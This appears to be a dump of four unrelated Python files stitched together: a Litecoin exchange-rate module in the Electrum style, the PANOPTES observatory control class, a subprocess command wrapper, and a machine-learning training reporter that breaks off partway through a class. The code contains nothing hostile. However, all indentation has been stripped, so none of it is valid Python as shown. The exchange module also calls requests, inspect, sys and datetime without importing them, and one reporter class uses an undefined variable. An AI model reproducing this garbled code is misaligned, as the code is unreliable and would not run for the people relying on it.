from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
from .util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class Bit2C(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bit2c.co.il', '/Exchanges/LTCNIS/Ticker.json')
return {'NIS': Decimal(json['ll'])}
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("LTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def historical_rates(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/LTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['LTC'][r]) for r in json['LTC']
if json['LTC'][r] is not None] # Giving NULL sometimes
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def historical_rates(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=LTC")[ccy +'_LTC']
class Bitfinex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitfinex.com', '/v1/pubticker/ltcusd')
return {'USD': Decimal(json['last_price'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/v2/ticker/ltcusd/')
return {'USD': Decimal(json['last'])}
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker?market=ltccny')
return {'CNY': Decimal(json['ticker']['last'])}
class CaVirtEx(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.cavirtex.com', '/api2/ticker.json?currencypair=LTCCAD')
return {'CAD': Decimal(json['ticker']['LTCCAD']['last'])}
class CoinSpot(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.coinspot.com.au', '/pubapi/latest')
return {'AUD': Decimal(json['prices']['ltc']['last'])}
class GoCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('x.g0cn.com', '/prices')
ltc_prices = json['prices']['LTC']
return dict([(r, Decimal(ltc_prices[r])) for r in ltc_prices])
class HitBTC(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD']
json = self.get_json('api.hitbtc.com', '/api/1/public/LTC%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['last'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
dicts = self.get_json('api.kraken.com', '/0/public/AssetPairs')
pairs = [k for k in dicts['result'] if k.startswith('XLTCZ')]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
ccys = [p[5:] for p in pairs]
result = dict.fromkeys(ccys)
result[ccy] = Decimal(json['result']['XLTCZ'+ccy]['c'][0])
return result
def history_ccys(self):
return ['EUR', 'USD']
def historical_rates(self, ccy):
query = '/0/public/OHLC?pair=LTC%s&interval=1440' % ccy
json = self.get_json('api.kraken.com', query)
history = json['result']['XLTCZ'+ccy]
return dict([(time.strftime('%Y-%m-%d', time.localtime(t[0])), t[4])
for t in history])
class OKCoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.okcoin.cn', '/api/ticker.do?symbol=ltc_cny')
return {'CNY': Decimal(json['ticker']['last'])}
class MercadoBitcoin(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('mercadobitcoin.net',
"/api/v2/ticker_litecoin")
return {'BRL': Decimal(json['ticker']['last'])}
class WEX(ExchangeBase):
def get_rates(self, ccy):
json_eur = self.get_json('wex.nz', '/api/3/ticker/ltc_eur')
json_rub = self.get_json('wex.nz', '/api/3/ticker/ltc_rur')
json_usd = self.get_json('wex.nz', '/api/3/ticker/ltc_usd')
return {'EUR': Decimal(json_eur['ltc_eur']['last']),
'RUB': Decimal(json_rub['ltc_rur']['last']),
'USD': Decimal(json_usd['ltc_usd']['last'])}
class Bitcointoyou(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('bitcointoyou.com',
"/API/ticker_litecoin.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def dictinvert(d):
inv = {}
for k, vlist in d.items():
for v in vlist:
keys = inv.setdefault(v, [])
keys.append(k)
return inv
def get_exchanges_and_currencies():
import os, json
path = os.path.join(os.path.dirname(__file__), 'currencies.json')
try:
return json.loads(open(path, 'r').read())
except:
pass
d = {}
is_exchange = lambda obj: (inspect.isclass(obj)
and issubclass(obj, ExchangeBase)
and obj != ExchangeBase)
exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
for name, klass in exchanges.items():
exchange = klass(None, None)
try:
d[name] = exchange.get_currencies()
except:
continue
with open(path, 'w') as f:
f.write(json.dumps(d, indent=4, sort_keys=True))
return d
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
if not history:
return dictinvert(CURRENCIES)
d = {}
exchanges = CURRENCIES.keys()
for name in exchanges:
klass = globals()[name]
exchange = klass(None, None)
d[name] = exchange.history_ccys()
return dictinvert(d)
class FxThread(ThreadJob):
def __init__(self, config, network):
self.config = config
self.network = network
self.ccy = self.get_currency()
self.history_used_spot = False
self.ccy_combo = None
self.hist_checkbox = None
self.set_exchange(self.config_exchange())
def get_currencies(self, h):
d = get_exchanges_by_ccy(h)
return sorted(d.keys())
def get_exchanges_by_ccy(self, ccy, h):
d = get_exchanges_by_ccy(h)
return d.get(ccy, [])
def ccy_amount_str(self, amount, commas):
prec = CCY_PRECISIONS.get(self.ccy, 2)
fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
return fmt_str.format(round(amount, prec))
def run(self):
# This runs from the plugins thread which catches exceptions
if self.is_enabled():
if self.timeout ==0 and self.show_history():
self.exchange.get_historical_rates(self.ccy)
if self.timeout <= time.time():
self.timeout = time.time() + 150
self.exchange.update(self.ccy)
def is_enabled(self):
return bool(self.config.get('use_exchange_rate'))
def set_enabled(self, b):
return self.config.set_key('use_exchange_rate', bool(b))
def get_history_config(self):
return bool(self.config.get('history_rates'))
def set_history_config(self, b):
self.config.set_key('history_rates', bool(b))
def get_fiat_address_config(self):
return bool(self.config.get('fiat_address'))
def set_fiat_address_config(self, b):
self.config.set_key('fiat_address', bool(b))
def get_currency(self):
'''Use when dynamic fetching is needed'''
return self.config.get("currency", "EUR")
def config_exchange(self):
return self.config.get('use_exchange', 'BitcoinAverage')
def show_history(self):
return self.is_enabled() and self.get_history_config() and self.ccy in self.exchange.history_ccys()
def set_currency(self, ccy):
self.ccy = ccy
self.config.set_key('currency', ccy, True)
self.timeout = 0 # Because self.ccy changes
self.on_quotes()
def set_exchange(self, name):
class_ = globals().get(name, BitcoinAverage)
self.print_error("using exchange", name)
if self.config_exchange() != name:
self.config.set_key('use_exchange', name, True)
self.exchange = class_(self.on_quotes, self.on_history)
# A new exchange means new fx quotes, initially empty. Force
# a quote refresh
self.timeout = 0
def on_quotes(self):
self.network.trigger_callback('on_quotes')
def on_history(self):
self.network.trigger_callback('on_history')
def exchange_rate(self):
'''Returns None, or the exchange rate as a Decimal'''
rate = self.exchange.quotes.get(self.ccy)
if rate:
return Decimal(rate)
def format_amount_and_units(self, btc_balance):
rate = self.exchange_rate()
return '' if rate is None else "%s %s" % (self.value_str(btc_balance, rate), self.ccy)
def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
rate = self.exchange_rate()
return _(" (No FX rate available)") if rate is None else " 1 %s~%s %s" % (base_unit,
self.value_str(COIN / (10**(8 - decimal_point)), rate), self.ccy)
def value_str(self, satoshis, rate):
if satoshis is None: # Can happen with incomplete history
return _("Unknown")
if rate:
value = Decimal(satoshis) / COIN * Decimal(rate)
return "%s" % (self.ccy_amount_str(value, True))
return _("No data")
def history_rate(self, d_t):
rate = self.exchange.historical_rate(self.ccy, d_t)
# Frequently there is no rate for today, until tomorrow :)
# Use spot quotes in that case
if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
rate = self.exchange.quotes.get(self.ccy)
self.history_used_spot = True
return rate
def historical_value_str(self, satoshis, d_t):
rate = self.history_rate(d_t)
return self.value_str(satoshis, rate)
|
core.py
|
import queue
import time
import zmq
from multiprocessing import Process
from multiprocessing import Queue
from astropy import units as u
from . import PanBase
from .observatory import Observatory
from .state.machine import PanStateMachine
from .utils import current_time
from .utils import get_free_space
from .utils.messaging import PanMessaging
class POCS(PanStateMachine, PanBase):
"""The main class representing the Panoptes Observatory Control Software (POCS).
Interaction with a PANOPTES unit is done through instances of this class. An instance consists
primarily of an `Observatory` object, which contains the mount, cameras, scheduler, etc.
See `pocs.Observatory`. The instance itself is designed to be run as a state machine with
the `get_ready()` method the transition that is responsible for moving to the initial state.
Args:
state_machine_file(str): Filename of the state machine to use, defaults to 'simple_state_table'
messaging(bool): If messaging should be included, defaults to False
simulator(list): A list of the different modules that can run in simulator mode. Possible
modules include: all, mount, camera, weather, night. Defaults to an empty list.
Attributes:
name (str): Name of PANOPTES unit
next_state (str): The next state for the state machine
observatory (`pocs.observatory.Observatory`): The `~pocs.observatory.Observatory` object
"""
def __init__(self, state_machine_file='simple_state_table', messaging=False, **kwargs):
# Explicitly call the base classes in the order we want
PanBase.__init__(self, **kwargs)
self.logger.info('Initializing PANOPTES unit')
self._processes = {}
self._has_messaging = None
self.has_messaging = messaging
self._sleep_delay = kwargs.get('sleep_delay', 2.5) # Loop delay
self._safe_delay = kwargs.get('safe_delay', 60 * 5) # Safety check delay
self._is_safe = False
PanStateMachine.__init__(self, state_machine_file, **kwargs)
# Create our observatory, which does the bulk of the work
self.observatory = Observatory(**kwargs)
self._connected = True
self._initialized = False
self._interrupted = False
self.force_reschedule = False
self.status()
self.name = self.config.get('name', 'Generic PANOPTES Unit')
self.logger.info('Welcome {}!'.format(self.name))
self.say("Hi there!")
@property
def is_initialized(self):
""" Indicates if POCS has been initalized or not """
return self._initialized
@property
def interrupted(self):
"""If POCS has been interrupted
Returns:
bool: If an interrupt signal has been received
"""
return self._interrupted
@property
def connected(self):
""" Indicates if POCS is connected """
return self._connected
@property
def has_messaging(self):
return self._has_messaging
@has_messaging.setter
def has_messaging(self, value):
self._has_messaging = value
if self._has_messaging:
self._setup_messaging()
##################################################################################################
# Methods
##################################################################################################
def initialize(self):
""" """
if not self._initialized:
self.say("Initializing the system! Woohoo!")
try:
# Initialize the mount
self.logger.debug("Initializing mount")
self.observatory.mount.initialize()
except Exception as e:
self.say("Oh wait. There was a problem initializing: {}".format(e))
self.say("Since we didn't initialize, I'm going to exit.")
self.power_down()
else:
self._initialized = True
self.status()
return self._initialized
def status(self):
status = dict()
try:
status['state'] = self.state
status['system'] = {
'free_space': get_free_space().value,
}
status['observatory'] = self.observatory.status()
except Exception as e: # pragma: no cover
self.logger.warning("Can't get status: {}".format(e))
else:
self.send_message(status, channel='STATUS')
return status
def say(self, msg):
""" PANOPTES Units like to talk!
Send a message. Message sent out through zmq has unit name as channel.
Args:
msg(str): Message to be sent
"""
self.send_message(msg, channel='PANCHAT')
def send_message(self, msg, channel='POCS'):
""" Send a message
This will use the `self._msg_publisher` to send a message
Note:
The `channel` and `msg` params are switched for convenience
Arguments:
msg {str} -- Message to be sent
Keyword Arguments:
channel {str} -- Channel to send message on (default: {'POCS'})
"""
if self.has_messaging:
self._msg_publisher.send_message(channel, msg)
def check_messages(self):
""" Check messages for the system
If `self.has_messaging` is True then there is a separate process runing
responsible for checking incoming zeromq messages. That process will fill
various `queue.Queue`s with messages depending on their type. This method
is a thin-wrapper around private methods that are responsible for message
dispatching based on which queue received a message.
"""
if self.has_messaging:
self._check_messages('command', self._cmd_queue)
self._check_messages('schedule', self._sched_queue)
def power_down(self):
"""Actions to be performed upon shutdown
Note:
This method is automatically called from the interrupt handler. The definition should
include what you want to happen upon shutdown but you don't need to worry about calling
it manually.
"""
if self.connected:
self.say("I'm powering down")
self.logger.info("Shutting down {}, please be patient and allow for exit.".format(self.name))
# Park if needed
if self.state not in ['parking', 'parked', 'sleeping', 'housekeeping']:
if self.observatory.mount.is_connected:
if not self.observatory.mount.is_parked:
self.logger.info("Parking mount")
self.park()
if self.state == 'parking':
if self.observatory.mount.is_connected:
if self.observatory.mount.is_parked:
self.logger.info("Mount is parked, setting Parked state")
self.set_park()
if not self.observatory.mount.is_parked:
self.logger.info('Mount not parked, parking')
self.observatory.mount.park()
# Observatory shut down
self.observatory.power_down()
# Shut down messaging
self.logger.debug('Shutting down messaging system')
for name, proc in self._processes.items():
if proc.is_alive():
self.logger.debug('Terminating {} - PID {}'.format(name, proc.pid))
proc.terminate()
self._keep_running = False
self._do_states = False
self._connected = False
self.logger.info("Power down complete")
##################################################################################################
# Safety Methods
##################################################################################################
def is_safe(self):
"""Checks the safety flag of the system to determine if safe.
This will check the weather station as well as various other environmental
aspects of the system in order to determine if conditions are safe for operation.
Note:
This condition is called by the state machine during each transition
Args:
called from the state machine.
Returns:
bool: Latest safety flag
Deleted Parameters:
event_data(transitions.EventData): carries information about the event if
"""
is_safe_values = dict()
# Check if night time
is_safe_values['is_dark'] = self.is_dark()
# Check weather
is_safe_values['good_weather'] = self.is_weather_safe()
is_safe_values['free_space'] = self.has_free_space()
safe = all(is_safe_values.values())
if not safe:
self.logger.warning('Unsafe conditions: {}'.format(is_safe_values))
# Not safe so park unless we are not active
if self.state not in ['sleeping', 'parked', 'parking', 'housekeeping', 'ready']:
self.logger.warning('Safety failed so sending to park')
self.park()
return safe
def is_dark(self):
"""Is it dark
Checks whether it is dark at the location provided. This checks for the config
entry `location.horizon` or 18 degrees (astronomical twilight).
Returns:
bool: Is night at location
"""
if 'night' in self.config['simulator']:
self.logger.debug("Night simulator says safe")
is_dark = True
else:
is_dark = self.observatory.is_dark
self.logger.debug("Dark Check: {}".format(is_dark))
return is_dark
def is_weather_safe(self, stale=180):
"""Determines whether current weather conditions are safe or not
Args:
stale (int, optional): Number of seconds before record is stale, defaults to 180
Returns:
bool: Conditions are safe (True) or unsafe (False)
"""
assert self.db.current, self.logger.warning("No connection to sensors, can't check weather safety")
# Always assume False
is_safe = False
record = {'safe': False}
if 'weather' in self.config['simulator']:
self.logger.debug("Weather simulator always safe")
is_safe = True
else:
try:
record = self.db.current.find_one({'type': 'weather'})
is_safe = record['data'].get('safe', False)
timestamp = record['date']
age = (current_time().datetime - timestamp).total_seconds()
self.logger.debug("Weather Safety: {} [{:.0f} sec old - {}]".format(is_safe, age, timestamp))
except TypeError as e:
self.logger.warning("No record found in Mongo DB")
self.logger.debug('DB: {}'.format(self.db.current))
else:
if age > stale:
self.logger.warning("Weather record looks stale, marking unsafe.")
is_safe = False
self._is_safe = is_safe
return self._is_safe
def has_free_space(self, required_space=0.25 * u.gigabyte):
"""Does hard drive have disk space (>= 0.5 GB)
Args:
required_space (u.gigabyte, optional): Amount of free space required
for operation
Returns:
bool: True if enough space
"""
free_space = get_free_space()
return free_space.value >= required_space.to(u.gigabyte).value
##################################################################################################
# Convenience Methods
##################################################################################################
def sleep(self, delay=2.5, with_status=True):
""" Send POCS to sleep
Loops for `delay` number of seconds. If `delay` is more than 10.0 seconds,
`check_messages` will be called every 10.0 seconds in order to allow for
interrupt.
Keyword Arguments:
delay {float} -- Number of seconds to sleep (default: 2.5)
with_status {bool} -- Show system status while sleeping (default: {True if delay > 2.0})
"""
if delay is None:
delay = self._sleep_delay
if with_status and delay > 2.0:
self.status()
# If delay is greater than 10 seconds check for messages during wait
if delay >= 10.0:
while delay >= 10.0:
time.sleep(10.0)
delay -= 10.0
self.check_messages()
if delay > 0.0:
time.sleep(delay)
def wait_until_safe(self):
""" Waits until weather is safe
This will wait until a True value is returned from the safety check,
blocking until then.
"""
while not self.is_safe():
self.sleep(delay=self._safe_delay)
##################################################################################################
# Private Methods
##################################################################################################
def _check_messages(self, queue_type, q):
cmd_dispatch = {
'command': {
'park': self._interrupt_and_park,
'shutdown': self._interrupt_and_shutdown,
},
'schedule': {}
}
while True:
try:
msg_obj = q.get_nowait()
call_method = msg_obj.get('message', '')
# Lookup and call the method
self.logger.info('Message received: {} {}'.format(queue_type, call_method))
cmd_dispatch[queue_type][call_method]()
except queue.Empty:
break
except KeyError:
pass
except Exception as e:
self.logger.warning('Problem calling method from messaging: {}'.format(e))
else:
break
def _interrupt_and_park(self):
self.logger.info('Park interrupt received')
self._interrupted = True
self.park()
def _interrupt_and_shutdown(self):
self.logger.warning('Shutdown command received')
self._interrupted = True
self.power_down()
def _setup_messaging(self):
cmd_port = self.config['messaging']['cmd_port']
msg_port = self.config['messaging']['msg_port']
def create_forwarder(port):
PanMessaging.create_forwarder(port, port + 1)
cmd_forwarder_process = Process(target=create_forwarder, args=(cmd_port,), name='CmdForwarder')
cmd_forwarder_process.start()
msg_forwarder_process = Process(target=create_forwarder, args=(msg_port,), name='MsgForwarder')
msg_forwarder_process.start()
self._do_cmd_check = True
self._cmd_queue = Queue()
self._sched_queue = Queue()
self._msg_publisher = PanMessaging.create_publisher(msg_port)
def check_message_loop(cmd_queue):
cmd_subscriber = PanMessaging.create_subscriber(cmd_port + 1)
poller = zmq.Poller()
poller.register(cmd_subscriber.socket, zmq.POLLIN)
try:
while self._do_cmd_check:
# Poll for messages
sockets = dict(poller.poll(500)) # 500 ms timeout
if cmd_subscriber.socket in sockets and sockets[cmd_subscriber.socket] == zmq.POLLIN:
msg_type, msg_obj = cmd_subscriber.receive_message(flags=zmq.NOBLOCK)
# Put the message in a queue to be processed
if msg_type == 'POCS-CMD':
cmd_queue.put(msg_obj)
time.sleep(1)
except KeyboardInterrupt:
pass
self.logger.debug('Starting command message loop')
check_messages_process = Process(target=check_message_loop, args=(self._cmd_queue,))
check_messages_process.name = 'MessageCheckLoop'
check_messages_process.start()
self.logger.debug('Command message subscriber set up on port {}'.format(cmd_port))
self._processes = {
'check_messages': check_messages_process,
'cmd_forwarder': cmd_forwarder_process,
'msg_forwarder': msg_forwarder_process,
}
|
wrap_cmd_call.py
|
import logging
import subprocess
from enum import Enum
from subprocess import Popen, PIPE
from queue import Queue
from threading import Thread
from typing import List, Optional, Callable
from klgists import logger
from klgists.common.exceptions import ExternalCommandFailed
class PipeType(Enum):
STDOUT = 1
STDERR = 2
def _disp(out, ell, name):
out = out.strip()
if '\n' in out:
ell(name + ":\n<<=====\n" + out + '\n=====>>')
elif len(out) > 0:
ell(name + ": <<===== " + out + " =====>>")
else:
ell(name + ": <no output>")
def _log(out, err, ell):
_disp(out, ell, "stdout")
_disp(err, ell, "stderr")
def smart_log_callback(source, line, prefix: str = '') -> None:
line = line.decode('utf-8')
if line.startswith('FATAL:'):
logger.fatal(prefix + line)
elif line.startswith('ERROR:'):
logger.error(prefix + line)
elif line.startswith('WARNING:'):
logger.warning(prefix + line)
elif line.startswith('INFO:'):
logger.info(prefix + line)
elif line.startswith('DEBUG:'):
logger.debug(prefix + line)
else:
logger.debug(prefix + line)
def _reader(pipe_type, pipe, queue):
try:
with pipe:
for line in iter(pipe.readline, b''):
queue.put((pipe_type, line))
finally:
queue.put(None)
def stream_cmd_call(cmd: List[str], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell_cmd: str=None, cwd: Optional[str] = None, timeout_secs: Optional[float] = None, log_callback: Callable[[PipeType, bytes], None] = None, bufsize: int = 1) -> None:
"""Calls an external command, waits, and throws a ExternalCommandFailed for nonzero exit codes.
Returns (stdout, stderr).
The user can optionally provide a shell to run the command with, e.g. "powershell.exe"
"""
if log_callback is None:
log_callback = smart_log_callback
cmd = [str(p) for p in cmd]
if shell_cmd:
cmd = [shell_cmd] + cmd
logger.debug("Streaming '{}'".format(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=PIPE, stderr=PIPE, cwd=cwd, bufsize=bufsize)
try:
q = Queue()
Thread(target=_reader, args=[PipeType.STDOUT, p.stdout, q]).start()
Thread(target=_reader, args=[PipeType.STDERR, p.stderr, q]).start()
for _ in range(2):
for source, line in iter(q.get, None):
log_callback(source, line)
exit_code = p.wait(timeout=timeout_secs)
finally:
p.kill()
if exit_code != 0:
raise ExternalCommandFailed("Got nonzero exit code {} from '{}'".format(exit_code, ' '.join(cmd)), cmd, exit_code, '<<unknown>>', '<<unknown>>')
def wrap_cmd_call(cmd: List[str], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell_cmd: str=None, cwd: Optional[str] = None, timeout_secs: Optional[float] = None) -> (str, str):
"""Calls an external command, waits, and throws a ExternalCommandFailed for nonzero exit codes.
Returns (stdout, stderr).
The user can optionally provide a shell to run the command with, e.g. "powershell.exe"
"""
cmd = [str(p) for p in cmd]
if shell_cmd:
cmd = [shell_cmd] + cmd
logger.debug("Calling '{}'".format(' '.join(cmd)))
p = subprocess.Popen(cmd, stdout=stdout, stderr=stderr, cwd=cwd)
out, err, exit_code = None, None, None
try:
(out, err) = p.communicate(timeout=timeout_secs)
out = out.decode('utf-8')
err = err.decode('utf-8')
exit_code = p.wait(timeout=timeout_secs)
except Exception as e:
_log(out, err, logger.warning)
raise e
finally:
p.kill()
if exit_code != 0:
_log(out, err, logger.warning)
raise ExternalCommandFailed("Got nonzero exit code {} from '{}'".format(exit_code, ' '.join(cmd)), cmd, exit_code, out, err)
_log(out, err, logger.debug)
return out, err
__all__ = ['wrap_cmd_call', 'stream_cmd_call']
|
reporter.py
|
# -*- coding:utf-8 -*-
# Copyright xmuspeech (Author: Snowdar 2020-02-09)
import os, sys
import time
import shutil
import logging
import progressbar
import traceback
import pandas as pd
from multiprocessing import Process, Queue
import libs.support.utils as utils
# Logger
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Reporter():
def __init__(self, trainer):
default_params = {
"report_times_every_epoch": None,
"report_interval_iters": 100,
"record_file": "train.csv",
"use_tensorboard": False
}
self.trainer = trainer
default_params = utils.assign_params_dict(default_params, self.trainer.params)
if default_params["report_times_every_epoch"] is not None:
self.report_interval_iters = max(1, self.trainer.training_point[2] // default_params["report_times_every_epoch"])
else:
self.report_interval_iters = default_params["report_interval_iters"]
if not self.trainer.params["debug"] and default_params["use_tensorboard"]:
# from tensorboardX import SummaryWriter
from torch.utils.tensorboard import SummaryWriter
model_name = os.path.basename(self.trainer.params["model_dir"])
# time_string = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
# time_string = self.trainer.params["time_string"]
# self.board_writer = SummaryWriter("{}/log/{}-{}-tensorboard".format(self.trainer.params["model_dir"], model_name, time_string))
# self.board_writer = SummaryWriter("{}/log/{}-{}-tensorboard".format(
# self.trainer.params["model_dir"], time_string, model_name))
self.board_writer = SummaryWriter("{}/log/tensorboard".format(self.trainer.params["model_dir"]))
else:
self.board_writer = None
self.epochs = self.trainer.params["epochs"]
self.optimizer = self.trainer.elements["optimizer"]
# For optimizer wrapper such as lookahead.
# "None" is the default value
if getattr(self.optimizer, "optimizer", None) is not None:
self.optimizer = self.optimizer.optimizer
self.device = "[{0}]".format(utils.get_device(self.trainer.elements["model"]))
self.record_value = []
self.start_write_log = False
if not self.trainer.params["debug"] and default_params["record_file"] != "" and default_params["record_file"] is not None:
self.record_file = "{0}/log/{1}".format(self.trainer.params["model_dir"], default_params["record_file"])
# The case to recover training
if self.trainer.params["start_epoch"] > 0:
# train.csv using append mode
self.start_write_log = True
elif os.path.exists(self.record_file):
# Do backup to avoid clearing the loss log when re-running a same launcher.
bk_file = "{0}.backup.{1}".format(
self.record_file, time.strftime('%Y-%m-%d_%H:%M:%S', time.localtime(time.time())))
shutil.move(self.record_file, bk_file)
else:
self.record_file = None
# A format to show progress
# Do not use progressbar.Bar(marker="\x1b[32m█\x1b[39m") and progressbar.SimpleProgress(format='%(value_s)s/%(max_value_s)s') to avoid too long string.
widgets = [progressbar.Percentage(format='%(percentage)3.2f%%'), " | ",
"Epoch:", progressbar.Variable('current_epoch', format='{formatted_value}', width=0, precision=0), "/{0}, ".format(self.epochs),
"Iter:", progressbar.Variable('current_iter', format='{formatted_value}', width=0, precision=0), "/{0}".format(self.trainer.training_point[2]),
" (", progressbar.Timer(format='ELA: %(elapsed)s'), ", ", progressbar.AdaptiveETA(), ")"]
# total num of iter
max_value = self.trainer.params["epochs"] * self.trainer.training_point[2]
self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets, redirect_stdout=True)
# Use multi-process for update.
self.queue = Queue()
self.process = Process(target=self._update, daemon=True)
self.process.start()
def is_report(self, training_point):
return (training_point[1] % self.report_interval_iters == 0 or
training_point[1] + 1 == training_point[2])
def record(self, info_dict, training_point):
if self.record_file is not None:
self.record_value.append(info_dict)
if self.is_report(training_point):
print("Device:{0}, {1}".format(self.device, utils.dict_to_params_str(info_dict, auto=False, sep=", ")))
dataframe = pd.DataFrame(self.record_value)
if self.start_write_log:
dataframe.to_csv(self.record_file, mode='a', header=False, index=False)
else:
# with open(self.record_file, "w") as f:
# f.truncate()
dataframe.to_csv(self.record_file, header=True, index=False)
self.start_write_log = True
self.record_value.clear()
def _update(self):
# Do not use any var which will be updated by main process, such as self.trainer.training_point.
while True:
try:
res = self.queue.get()
if res is None:
self.bar.finish()
break
snapshot, training_point, current_lr = res
current_epoch, current_iter, num_batchs_train = training_point
updated_iters = current_epoch * num_batchs_train + current_iter + 1
self.bar.update(updated_iters, current_epoch=current_epoch + 1, current_iter=current_iter + 1)
real_snapshot = snapshot.pop("real")
if self.board_writer is not None:
self.board_writer.add_scalars("scalar_base", {"epoch": float(current_epoch + 1),
"lr": current_lr}, updated_iters)
loss_dict = {}
acc_dict = {}
for key in real_snapshot.keys():
if "loss" in key:
loss_dict[key] = real_snapshot[key]
elif "acc" in key:
acc_dict[key] = real_snapshot[key]
else:
self.board_writer.add_scalar(key, real_snapshot[key], updated_iters)
self.board_writer.add_scalars("scalar_acc", acc_dict, updated_iters)
self.board_writer.add_scalars("scalar_loss", loss_dict, updated_iters)
info_dict = {"epoch": current_epoch + 1, "iter": current_iter + 1,
"position": updated_iters, "lr": "{0:.8f}".format(current_lr)}
info_dict.update(snapshot)
self.record(info_dict, training_point)
except BaseException as e:
self.bar.finish()
if not isinstance(e, KeyboardInterrupt):
traceback.print_exc()
sys.exit(1)
def update(self, snapshot: dict):
# One update calling and one using of self.trainer.training_point and current_lr.
# training_point is updated on line 265 in trainer.py
current_lr = self.optimizer.state_dict()['param_groups'][0]['lr']
self.queue.put((snapshot, self.trainer.training_point, current_lr))
def finish(self):
self.queue.put(None)
# Wait process completed.
self.process.join()
class LRFinderReporter():
def __init__(self, max_value, log_dir=None, comment=None):
if log_dir is not None:
assert isinstance(log_dir, str)
from tensorboardX import SummaryWriter
# TODO
# time_string = time.strftime('%Y-%m-%d-%H-%M-%S', time.localtime(time.time()))
if comment is None:
comment = ""
else:
comment = comment + "-"
self.board_writer = SummaryWriter("{}/{}{}-lr-finder-tensorboard".format(log_dir, comment, time_string))
else:
self.board_writer = None
widgets = [progressbar.Percentage(format='%(percentage)3.2f%%'), " | ", "Iter:",
progressbar.Variable('current_iter', format='{formatted_value}', width=0, precision=0), "/{0}".format(max_value), ", ",
progressbar.Variable('snapshot', format='{formatted_value}', width=8, precision=0),
" (", progressbar.Timer(format='ELA: %(elapsed)s'), ", ", progressbar.AdaptiveETA(), ")"]
self.bar = progressbar.ProgressBar(max_value=max_value, widgets=widgets, redirect_stdout=True)
# Use multi-process for update.
